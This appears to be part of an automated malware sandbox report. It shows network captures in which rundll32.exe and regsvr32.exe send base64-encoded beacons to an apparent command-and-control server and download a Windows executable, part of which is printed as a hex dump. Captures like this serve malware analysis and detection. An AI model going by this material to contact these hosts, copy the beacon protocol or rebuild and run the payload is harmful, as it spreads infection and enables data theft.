                    Data Raw: 64 61 74 61 3d 65 79 4a 42 62 6c 64 47 61 43 49 36 49 6a 42 73 65 6e 68 79 64 30 39 34 4e 44 52 31 4e 79 74 49 55 32 73 30 4f 58 63 39 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6b 77 54 32 46 31 4d 32 70 54 4f 56 6b 7a 56 47 74 33 4d 6d 73 35 59 57 6c 51 4c 31 52 46 50 53 49 73 49 6b 68 6b 56 6c 46 77 51 53 49 36 49 6e 6f 7a 59 6c 4e 32 51 33 56 4f 4d 33 46 78 55 79 49 73 49 6c 46 47 57 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 56 45 51 30 39 36 4d 31 68 51 49 69 77 69 55 6d 4a 76 64 43 49 36 49 6a 4a 56 4c 32 78 30 5a 33 56 30 4b 30 70 78 64 53 49 73 49 6c 4e 69 57 6c 64 75 57 43 49 36 49 6e 5a 71 55 30 64 36 57 44 64 4d 49 69 77 69 57 57 74 4b 56 79 49 36 57 79 49 78 52 30 68 6a 49 6c 30 73 49 6d 4e 6d 53 31 67 69 4f 69 4a 31 5a 7a 30 39 49 69 77 69 61 45 35 76 64 6b 70 74 49 6a 6f 69 65 44 49 33 52 47 31 44 52 46 67 31 5a 57 4a 6c 4e 6b 5a 45 4e 7a 46 79 5a 6a 49 35 55 32 68 44 59 33 6c 76 55 44 4a 52 61 30 77 76 5a 45 68 6f 63 48 4e 77 56 57 35 6a 51 56 70 33 4b 7a 42 47 61 31 49 30 50 53 49 73 49 [TRUNCATED]
                    Data Ascii: data=eyJBbldGaCI6IjBsenhyd094NDR1NytIU2s0OXc9IiwiRnN0TCI6InkwT2F1M2pTOVkzVGt3Mms5YWlQL1RFPSIsIkhkVlFwQSI6InozYlN2Q3VOM3FxUyIsIlFGWnlpaVVYWSI6InVEQ096M1hQIiwiUmJvdCI6IjJVL2x0Z3V0K0pxdSIsIlNiWlduWCI6InZqU0d6WDdMIiwiWWtKVyI6WyIxR0hjIl0sImNmS1giOiJ1Zz09IiwiaE5vdkptIjoieDI3RG1DRFg1ZWJlNkZENzFyZjI5U2hDY3lvUDJRa0wvZEhocHNwVW5jQVp3KzBGa1I0PSIsIm9CdU1VdSI6IjZITFlremliMHJ5ViIsInN0dVkiOiJ0akdPekE9PSIsInZvSmMiOiIrRy85bmc9PSIsIndBY0giOiJ5R25abkNETW1mL1FteEc1Iiwid1FlUkgiOiJ1RFNYdnlXTCIsInhlQ2NqUyI6InoyVGFsQ0k9IiwieWlpVVhZIjoielRycnFpV1IwNkNKMkdQYXl1ejE5MVpHWnpVdCtVZFpwNDNpdEtRUjE0cz0ifQ==
                    Oct 6, 2024 13:25:27.328933001 CEST218INHTTP/1.1 200 OK
                    Date: Sun, 06 Oct 2024 11:25:27 GMT
                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                    X-Powered-By: PHP/8.2.12
                    Content-Length: 20
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 56 58 59 77 49 6e 30 3d
                    Data Ascii: eyJUUGQiOiI3VXYwIn0=


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.749771193.109.85.31548017404C:\Windows\SysWOW64\rundll32.exe
                    TimestampBytes transferredDirectionData
                    Oct 6, 2024 13:25:27.339428902 CEST452OUTPOST /blueoceansite/templates/docs/index.php HTTP/1.1
                    User-Agent: Microsoft-WNS/10.0
                    Host: vilodeqa.com
                    Content-Length: 249
                    Content-Type: application/x-www-form-urlencoded
                    Accept-Language: fr-CA
                    Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 53 46 68 73 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6b 77 54 32 46 31 4d 32 70 54 4f 56 6b 7a 56 47 74 33 4d 6d 73 35 59 57 6c 51 4c 31 52 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 56 58 59 77 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 48 4c 7a 6c 75 5a 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 48 62 6c 70 75 51 30 52 4e 62 57 59 76 55 57 31 34 52 7a 55 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 4d 6c 52 68 62 45 4e 4a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 55 63 6e 4a 78 61 56 64 53 4d 44 5a 44 53 6a 4a 48 55 47 46 35 64 58 6f 78 4f 54 46 61 52 31 70 36 56 58 51 72 56 57 52 61 63 44 51 7a 61 58 52 4c 55 56 49 78 4e 48 4d 39 49 6e 30 3d
                    Data Ascii: data=eyJDS3oiOiJ5SFhsIiwiRnN0TCI6InkwT2F1M2pTOVkzVGt3Mms5YWlQL1RFPSIsInZZdEIiOiI3VXYwIiwidm9KYyI6IitHLzluZz09Iiwid0FjSCI6InlHblpuQ0RNbWYvUW14RzUiLCJ4ZUNjalMiOiJ6MlRhbENJPSIsInlpaVVYWSI6InpUcnJxaVdSMDZDSjJHUGF5dXoxOTFaR1p6VXQrVWRacDQzaXRLUVIxNHM9In0=
                    Oct 6, 2024 13:25:28.155972958 CEST218INHTTP/1.1 200 OK
                    Date: Sun, 06 Oct 2024 11:25:27 GMT
                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                    X-Powered-By: PHP/8.2.12
                    Content-Length: 20
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 56 58 59 77 49 6e 30 3d
                    Data Ascii: eyJUUGQiOiI3VXYwIn0=


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.749772193.109.85.31548017520C:\Windows\SysWOW64\rundll32.exe
                    TimestampBytes transferredDirectionData
                    Oct 6, 2024 13:25:27.370230913 CEST452OUTPOST /blueoceansite/templates/docs/index.php HTTP/1.1
                    User-Agent: Microsoft-WNS/10.0
                    Host: vilodeqa.com
                    Content-Length: 249
                    Content-Type: application/x-www-form-urlencoded
                    Accept-Language: fr-CA
                    Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 53 46 68 73 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6b 77 54 32 46 31 4d 32 70 54 4f 56 6b 7a 56 47 74 33 4d 6d 73 35 59 57 6c 51 4c 31 52 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 56 58 59 77 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 48 4c 7a 6c 75 5a 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 48 62 6c 70 75 51 30 52 4e 62 57 59 76 55 57 31 34 52 7a 55 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 4d 6c 52 68 62 45 4e 4a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 55 63 6e 4a 78 61 56 64 53 4d 44 5a 44 53 6a 4a 48 55 47 46 35 64 58 6f 78 4f 54 46 61 52 31 70 36 56 58 51 72 56 57 52 61 63 44 51 7a 61 58 52 4c 55 56 49 78 4e 48 4d 39 49 6e 30 3d
                    Data Ascii: data=eyJDS3oiOiJ5SFhsIiwiRnN0TCI6InkwT2F1M2pTOVkzVGt3Mms5YWlQL1RFPSIsInZZdEIiOiI3VXYwIiwidm9KYyI6IitHLzluZz09Iiwid0FjSCI6InlHblpuQ0RNbWYvUW14RzUiLCJ4ZUNjalMiOiJ6MlRhbENJPSIsInlpaVVYWSI6InpUcnJxaVdSMDZDSjJHUGF5dXoxOTFaR1p6VXQrVWRacDQzaXRLUVIxNHM9In0=
                    Oct 6, 2024 13:25:28.200218916 CEST218INHTTP/1.1 200 OK
                    Date: Sun, 06 Oct 2024 11:25:27 GMT
                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                    X-Powered-By: PHP/8.2.12
                    Content-Length: 20
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 56 58 59 77 49 6e 30 3d
                    Data Ascii: eyJUUGQiOiI3VXYwIn0=


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.749808193.109.85.31548017984C:\Windows\SysWOW64\regsvr32.exe
                    TimestampBytes transferredDirectionData
                    Oct 6, 2024 13:25:32.469784021 CEST784OUTPOST /blueoceansite/templates/docs/index.php HTTP/1.1
                    User-Agent: Microsoft-WNS/10.0
                    Host: vilodeqa.com
                    Content-Length: 581
                    Content-Type: application/x-www-form-urlencoded
                    Accept-Language: fr-CA
                    Data Raw: 64 61 74 61 3d 65 79 4a 42 62 6c 64 47 61 43 49 36 49 6a 42 73 65 6e 68 79 64 30 39 34 4e 44 52 31 4e 79 74 49 55 32 73 30 4f 58 63 39 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6b 77 54 32 46 31 4d 32 70 54 4f 56 6b 7a 56 47 74 33 4d 6d 73 35 59 57 6c 51 4c 31 52 46 50 53 49 73 49 6b 68 6b 56 6c 46 77 51 53 49 36 49 6e 6f 7a 59 6c 4e 32 51 33 56 4f 4d 33 46 78 55 79 49 73 49 6c 46 47 57 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 56 45 51 30 39 36 4d 31 68 51 49 69 77 69 55 6d 4a 76 64 43 49 36 49 6a 4a 56 4c 32 78 30 5a 33 56 30 4b 30 70 78 64 53 49 73 49 6c 4e 69 57 6c 64 75 57 43 49 36 49 6e 5a 71 55 30 64 36 57 44 64 4d 49 69 77 69 57 57 74 4b 56 79 49 36 57 79 49 78 52 30 68 6a 49 6c 30 73 49 6d 4e 6d 53 31 67 69 4f 69 4a 31 5a 7a 30 39 49 69 77 69 61 45 35 76 64 6b 70 74 49 6a 6f 69 65 44 49 33 52 47 31 44 52 46 67 31 5a 57 4a 6c 4e 6b 5a 45 4e 7a 46 79 5a 6a 49 35 55 32 68 44 59 33 6c 76 55 44 4a 52 61 30 77 76 5a 45 68 6f 63 48 4e 77 56 57 35 6a 51 56 70 33 4b 7a 42 47 61 31 49 30 50 53 49 73 49 [TRUNCATED]
                    Data Ascii: data=eyJBbldGaCI6IjBsenhyd094NDR1NytIU2s0OXc9IiwiRnN0TCI6InkwT2F1M2pTOVkzVGt3Mms5YWlQL1RFPSIsIkhkVlFwQSI6InozYlN2Q3VOM3FxUyIsIlFGWnlpaVVYWSI6InVEQ096M1hQIiwiUmJvdCI6IjJVL2x0Z3V0K0pxdSIsIlNiWlduWCI6InZqU0d6WDdMIiwiWWtKVyI6WyIxR0hjIl0sImNmS1giOiJ1Zz09IiwiaE5vdkptIjoieDI3RG1DRFg1ZWJlNkZENzFyZjI5U2hDY3lvUDJRa0wvZEhocHNwVW5jQVp3KzBGa1I0PSIsIm9CdU1VdSI6IjZITFlremliMHJ5ViIsInN0dVkiOiJ0akdPekE9PSIsInZvSmMiOiIrRy85bmc9PSIsIndBY0giOiJ5R25abkNETW1mL1FteEc1Iiwid1FlUkgiOiJ1RFNYdnlXTCIsInhlQ2NqUyI6IjIzUFNqdz09IiwieWlpVVhZIjoielRycnFpV1IwNkNKMkdQYXl1ejE5MVpHWnpVdDZVNU92WlBpdEtRUjE0cz0ifQ==
                    Oct 6, 2024 13:25:33.300898075 CEST218INHTTP/1.1 200 OK
                    Date: Sun, 06 Oct 2024 11:25:33 GMT
                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                    X-Powered-By: PHP/8.2.12
                    Content-Length: 20
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 56 58 59 77 49 6e 30 3d
                    Data Ascii: eyJUUGQiOiI3VXYwIn0=


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.749816193.109.85.31548017984C:\Windows\SysWOW64\regsvr32.exe
                    TimestampBytes transferredDirectionData
                    Oct 6, 2024 13:25:33.342725039 CEST452OUTPOST /blueoceansite/templates/docs/index.php HTTP/1.1
                    User-Agent: Microsoft-WNS/10.0
                    Host: vilodeqa.com
                    Content-Length: 249
                    Content-Type: application/x-www-form-urlencoded
                    Accept-Language: fr-CA
                    Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 53 46 68 73 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6b 77 54 32 46 31 4d 32 70 54 4f 56 6b 7a 56 47 74 33 4d 6d 73 35 59 57 6c 51 4c 31 52 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 56 58 59 77 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 48 4c 7a 6c 75 5a 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 48 62 6c 70 75 51 30 52 4e 62 57 59 76 55 57 31 34 52 7a 55 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 49 79 4d 31 42 54 61 6e 63 39 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 55 63 6e 4a 78 61 56 64 53 4d 44 5a 44 53 6a 4a 48 55 47 46 35 64 58 6f 78 4f 54 46 61 52 31 70 36 56 58 51 32 56 54 56 50 64 6c 70 51 61 58 52 4c 55 56 49 78 4e 48 4d 39 49 6e 30 3d
                    Data Ascii: data=eyJDS3oiOiJ5SFhsIiwiRnN0TCI6InkwT2F1M2pTOVkzVGt3Mms5YWlQL1RFPSIsInZZdEIiOiI3VXYwIiwidm9KYyI6IitHLzluZz09Iiwid0FjSCI6InlHblpuQ0RNbWYvUW14RzUiLCJ4ZUNjalMiOiIyM1BTanc9PSIsInlpaVVYWSI6InpUcnJxaVdSMDZDSjJHUGF5dXoxOTFaR1p6VXQ2VTVPdlpQaXRLUVIxNHM9In0=
                    Oct 6, 2024 13:25:34.194962025 CEST218INHTTP/1.1 200 OK
                    Date: Sun, 06 Oct 2024 11:25:33 GMT
                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                    X-Powered-By: PHP/8.2.12
                    Content-Length: 20
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 56 58 59 77 49 6e 30 3d
                    Data Ascii: eyJUUGQiOiI3VXYwIn0=


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    6192.168.2.749992193.109.85.31548017404C:\Windows\SysWOW64\rundll32.exe
                    TimestampBytes transferredDirectionData
                    Oct 6, 2024 13:27:38.336946964 CEST452OUTPOST /blueoceansite/templates/docs/index.php HTTP/1.1
                    User-Agent: Microsoft-WNS/10.0
                    Host: vilodeqa.com
                    Content-Length: 249
                    Content-Type: application/x-www-form-urlencoded
                    Accept-Language: fr-CA
                    Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 53 46 68 73 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6b 77 54 32 46 31 4d 32 70 54 4f 56 6b 7a 56 47 74 33 4d 6d 73 35 59 57 6c 51 4c 31 52 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 56 58 59 77 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 48 4c 7a 6c 75 5a 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 48 62 6c 70 75 51 30 52 4e 62 57 59 76 55 57 31 34 52 7a 55 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 4d 6c 52 68 62 45 4e 4a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 55 63 6e 4a 78 61 56 64 53 4d 44 5a 44 53 6a 4a 48 55 47 46 35 64 58 6f 78 4f 54 46 61 52 31 70 36 56 58 51 72 56 57 52 61 63 44 51 7a 61 58 52 4c 55 56 49 78 4e 48 4d 39 49 6e 30 3d
                    Data Ascii: data=eyJDS3oiOiJ5SFhsIiwiRnN0TCI6InkwT2F1M2pTOVkzVGt3Mms5YWlQL1RFPSIsInZZdEIiOiI3VXYwIiwidm9KYyI6IitHLzluZz09Iiwid0FjSCI6InlHblpuQ0RNbWYvUW14RzUiLCJ4ZUNjalMiOiJ6MlRhbENJPSIsInlpaVVYWSI6InpUcnJxaVdSMDZDSjJHUGF5dXoxOTFaR1p6VXQrVWRacDQzaXRLUVIxNHM9In0=
                    Oct 6, 2024 13:27:39.156363964 CEST218INHTTP/1.1 200 OK
                    Date: Sun, 06 Oct 2024 11:27:38 GMT
                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                    X-Powered-By: PHP/8.2.12
                    Content-Length: 20
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 56 58 59 77 49 6e 30 3d
                    Data Ascii: eyJUUGQiOiI3VXYwIn0=


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    7192.168.2.749993193.109.85.31548017520C:\Windows\SysWOW64\rundll32.exe
                    TimestampBytes transferredDirectionData
                    Oct 6, 2024 13:27:38.440324068 CEST452OUTPOST /blueoceansite/templates/docs/index.php HTTP/1.1
                    User-Agent: Microsoft-WNS/10.0
                    Host: vilodeqa.com
                    Content-Length: 249
                    Content-Type: application/x-www-form-urlencoded
                    Accept-Language: fr-CA
                    Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 53 46 68 73 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6b 77 54 32 46 31 4d 32 70 54 4f 56 6b 7a 56 47 74 33 4d 6d 73 35 59 57 6c 51 4c 31 52 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 56 58 59 77 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 48 4c 7a 6c 75 5a 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 48 62 6c 70 75 51 30 52 4e 62 57 59 76 55 57 31 34 52 7a 55 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 4d 6c 52 68 62 45 4e 4a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 55 63 6e 4a 78 61 56 64 53 4d 44 5a 44 53 6a 4a 48 55 47 46 35 64 58 6f 78 4f 54 46 61 52 31 70 36 56 58 51 72 56 57 52 61 63 44 51 7a 61 58 52 4c 55 56 49 78 4e 48 4d 39 49 6e 30 3d
                    Data Ascii: data=eyJDS3oiOiJ5SFhsIiwiRnN0TCI6InkwT2F1M2pTOVkzVGt3Mms5YWlQL1RFPSIsInZZdEIiOiI3VXYwIiwidm9KYyI6IitHLzluZz09Iiwid0FjSCI6InlHblpuQ0RNbWYvUW14RzUiLCJ4ZUNjalMiOiJ6MlRhbENJPSIsInlpaVVYWSI6InpUcnJxaVdSMDZDSjJHUGF5dXoxOTFaR1p6VXQrVWRacDQzaXRLUVIxNHM9In0=
                    Oct 6, 2024 13:27:39.246005058 CEST218INHTTP/1.1 200 OK
                    Date: Sun, 06 Oct 2024 11:27:39 GMT
                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                    X-Powered-By: PHP/8.2.12
                    Content-Length: 20
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 56 58 59 77 49 6e 30 3d
                    Data Ascii: eyJUUGQiOiI3VXYwIn0=


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    8192.168.2.749994193.109.85.31548017984C:\Windows\SysWOW64\regsvr32.exe
                    TimestampBytes transferredDirectionData
                    Oct 6, 2024 13:27:44.453346968 CEST452OUTPOST /blueoceansite/templates/docs/index.php HTTP/1.1
                    User-Agent: Microsoft-WNS/10.0
                    Host: vilodeqa.com
                    Content-Length: 249
                    Content-Type: application/x-www-form-urlencoded
                    Accept-Language: fr-CA
                    Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 35 53 46 68 73 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6b 77 54 32 46 31 4d 32 70 54 4f 56 6b 7a 56 47 74 33 4d 6d 73 35 59 57 6c 51 4c 31 52 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 49 33 56 58 59 77 49 69 77 69 64 6d 39 4b 59 79 49 36 49 69 74 48 4c 7a 6c 75 5a 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 6c 48 62 6c 70 75 51 30 52 4e 62 57 59 76 55 57 31 34 52 7a 55 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 49 79 4d 31 42 54 61 6e 63 39 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 55 63 6e 4a 78 61 56 64 53 4d 44 5a 44 53 6a 4a 48 55 47 46 35 64 58 6f 78 4f 54 46 61 52 31 70 36 56 58 51 32 56 54 56 50 64 6c 70 51 61 58 52 4c 55 56 49 78 4e 48 4d 39 49 6e 30 3d
                    Data Ascii: data=eyJDS3oiOiJ5SFhsIiwiRnN0TCI6InkwT2F1M2pTOVkzVGt3Mms5YWlQL1RFPSIsInZZdEIiOiI3VXYwIiwidm9KYyI6IitHLzluZz09Iiwid0FjSCI6InlHblpuQ0RNbWYvUW14RzUiLCJ4ZUNjalMiOiIyM1BTanc9PSIsInlpaVVYWSI6InpUcnJxaVdSMDZDSjJHUGF5dXoxOTFaR1p6VXQ2VTVPdlpQaXRLUVIxNHM9In0=
                    Oct 6, 2024 13:27:45.268975019 CEST218INHTTP/1.1 200 OK
                    Date: Sun, 06 Oct 2024 11:27:45 GMT
                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                    X-Powered-By: PHP/8.2.12
                    Content-Length: 20
                    Content-Type: text/html; charset=UTF-8
                    Data Raw: 65 79 4a 55 55 47 51 69 4f 69 49 33 56 58 59 77 49 6e 30 3d
                    Data Ascii: eyJUUGQiOiI3VXYwIn0=


                    HTTPS Proxied Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.749699193.109.85.274437404C:\Windows\SysWOW64\rundll32.exe
                    TimestampBytes transferredDirectionData
                    2024-10-06 11:25:12 UTC106OUTGET /account.aspx HTTP/1.1
                    User-Agent: Microsoft-WNS/11.0
                    Host: semurox.com
                    Cache-Control: no-cache
                    2024-10-06 11:25:12 UTC252INHTTP/1.1 200 OK
                    Date: Sun, 06 Oct 2024 11:25:12 GMT
                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                    Last-Modified: Sun, 06 Oct 2024 10:46:51 GMT
                    ETag: "87000-623cc9f2d1769"
                    Accept-Ranges: bytes
                    Content-Length: 552960
                    Connection: close
                    2024-10-06 11:25:12 UTC7940INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 06 19 79 7d 42 78 17 2e 42 78 17 2e 42 78 17 2e 91 0a 14 2f 48 78 17 2e 91 0a 12 2f ca 78 17 2e 91 0a 13 2f 56 78 17 2e 44 f9 12 2f 5c 78 17 2e 44 f9 13 2f 52 78 17 2e 44 f9 14 2f 56 78 17 2e 91 0a 16 2f 49 78 17 2e 42 78 16 2e cc 78 17 2e 28 f9 12 2f 40 78 17 2e 28 f9 17 2f 43 78 17 2e 28 f9 15 2f 43 78 17 2e 52 69 63 68 42 78 17 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$y}Bx.Bx.Bx./Hx./x./Vx.D/\x.D/Rx.D/Vx./Ix.Bx.x.(/@x.(/Cx.(/Cx.RichBx.
                    2024-10-06 11:25:12 UTC16384INData Raw: 00 00 00 00 83 ec 14 89 4d f0 c7 45 ec 0b 00 00 00 c6 45 e0 24 c6 45 e1 a4 c6 45 e2 30 c6 45 e3 05 c6 45 e4 32 c6 45 e5 33 c6 45 e6 2f c6 45 e7 65 c6 45 e8 1d c6 45 e9 9b c6 45 ea 75 a1 94 28 3d 10 83 e0 01 75 38 8b 0d 94 28 3d 10 83 c9 01 89 0d 94 28 3d 10 c7 45 fc 00 00 00 00 8d 55 e0 52 b9 88 28 3d 10 e8 91 ee ff ff 68 80 67 06 10 e8 1d 76 05 00 83 c4 04 c7 45 fc ff ff ff ff b8 88 28 3d 10 8b 4d f4 64 89 0d 00 00 00 00 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 89 4d fc 8b 45 08 c6 00 4f 33 c9 8b 55 08 83 c2 01 88 0a b8 0c 00 00 00 8b 4d 08 66 89 41 02 33 d2 8b 45 08 66 89 50 04 b9 02 00 00 00 8b 55 08 66 89 4a 06 b8 1f 00 00 00 8b 4d 08 66 89 41 08 ba 1a 00 00 00 8b 45 08 66 89 50 0a b9 1b 00 00 00 8b 55 08 66 89 4a 0c b8 0a 00 00 00 8b 4d
                    Data Ascii: MEE$EE0EE2E3E/EeEEEu(=u8(=(=EUR(=hgvE(=Md]UQMEO3UMfA3EfPUfJMfAEfPUfJM
                    2024-10-06 11:25:12 UTC16384INData Raw: 00 66 89 15 68 f1 07 10 69 05 50 f1 07 10 03 92 b2 14 0f b6 4d ef 2b c8 88 4d ef e9 32 01 00 00 0f bf 15 5c f1 07 10 85 d2 74 1f 8b 45 98 33 c9 89 45 c0 89 4d c4 8b 55 90 81 ea 13 ab 00 00 88 15 27 f0 07 10 e9 08 01 00 00 0f bf 45 d8 39 05 a4 f1 07 10 75 69 8b 0d 60 f1 07 10 8b 15 64 f1 07 10 68 7a 0d 0d 00 68 48 a1 80 28 52 51 e8 39 36 05 00 89 45 c0 89 55 c4 0f bf 45 e4 0f bf 0d a8 f1 07 10 0b 0d 80 f1 07 10 f7 d1 2b c1 33 d2 89 45 9c 89 55 a0 a1 58 f1 07 10 8b 4d cc 8b 55 d0 89 95 d4 fc ff ff 03 c8 8b 45 cc 8b 55 d0 e8 58 36 05 00 89 45 cc 89 55 d0 e9 93 00 00 00 8b 45 ac 0b 45 b0 75 0c c7 85 80 fe ff ff 01 00 00 00 eb 0a c7 85 80 fe ff ff 00 00 00 00 0f bf 0d 48 f1 07 10 3b 8d 80 fe ff ff 74 66 0f b6 15 27 f0 07 10 69 c2 7f f7 47 28 99 89 45 9c 89 55
                    Data Ascii: fhiPM+M2\tE3EMU'E9ui`dhzhH(RQ96EUE+3EUXMUEUX6EUEEuH;tf'iG(EU
                    2024-10-06 11:25:12 UTC16384INData Raw: 45 d0 99 89 85 30 fe ff ff 89 95 34 fe ff ff 8b 8d 30 fe ff ff 89 0d bc f1 07 10 e9 bd 01 00 00 0f b7 15 28 f1 07 10 85 d2 74 4d a1 60 f1 07 10 8b 0d 64 f1 07 10 2d fa 4b ea 64 83 d9 00 89 45 b8 89 4d bc 0f b7 15 c8 f1 07 10 a1 58 f1 07 10 2b c2 8b 0d 58 f1 07 10 2b c8 89 0d 58 f1 07 10 8b 45 94 8b 55 98 b1 08 e8 4f f7 04 00 66 a3 a0 f1 07 10 e9 65 01 00 00 0f be 55 e6 85 d2 75 0c c7 85 ac fe ff ff 01 00 00 00 eb 0a c7 85 ac fe ff ff 00 00 00 00 8b 45 b8 0b 45 bc 75 0c c7 85 a8 fe ff ff 01 00 00 00 eb 0a c7 85 a8 fe ff ff 00 00 00 00 8b 8d ac fe ff ff 3b 8d a8 fe ff ff 7f 0c c7 85 a4 fe ff ff 01 00 00 00 eb 0a c7 85 a4 fe ff ff 00 00 00 00 0f b6 15 27 f0 07 10 0f af 15 bc f1 07 10 85 d2 75 0c c7 85 a0 fe ff ff 01 00 00 00 eb 0a c7 85 a0 fe ff ff 00 00 00
                    Data Ascii: E040(tM`d-KdEMX+X+XEUOfeUuEEu;'u
                    2024-10-06 11:25:12 UTC16384INData Raw: 89 8d c4 fd ff ff eb 0b 0f 57 c0 66 0f 13 85 c0 fd ff ff 8b 95 c0 fd ff ff 81 ea 63 b6 ac ab 8b 85 c4 fd ff ff 1d 24 77 0e 00 89 95 f4 fc ff ff 89 85 f8 fc ff ff 8b 8d f4 fc ff ff 0b 8d f8 fc ff ff 74 69 8b 55 b0 81 f2 43 53 30 15 89 55 ac 0f b7 05 a0 f1 07 10 85 c0 74 13 8b 4d 9c 33 d2 89 8d e0 fd ff ff 89 95 e4 fd ff ff eb 12 8b 45 c8 8b 4d cc 89 85 e0 fd ff ff 89 8d e4 fd ff ff 8b 95 e0 fd ff ff 8b 85 e4 fd ff ff 89 15 60 f1 07 10 a3 64 f1 07 10 0f b6 0d 27 f0 07 10 0f af 4d b4 88 0d 27 f0 07 10 e9 cf 00 00 00 ba c0 df 00 00 85 d2 74 7e 8b 45 c0 8b 55 c4 b1 04 e8 f9 b6 04 00 a3 bc f1 07 10 8b 45 d0 8b 4d d4 89 85 ec fc ff ff 89 8d f0 fc ff ff 8b 95 ec fc ff ff 0b 95 f0 fc ff ff 75 14 33 c0 c7 85 b8 fd ff ff 01 00 00 00 89 85 bc fd ff ff eb 0b 0f 57 c0
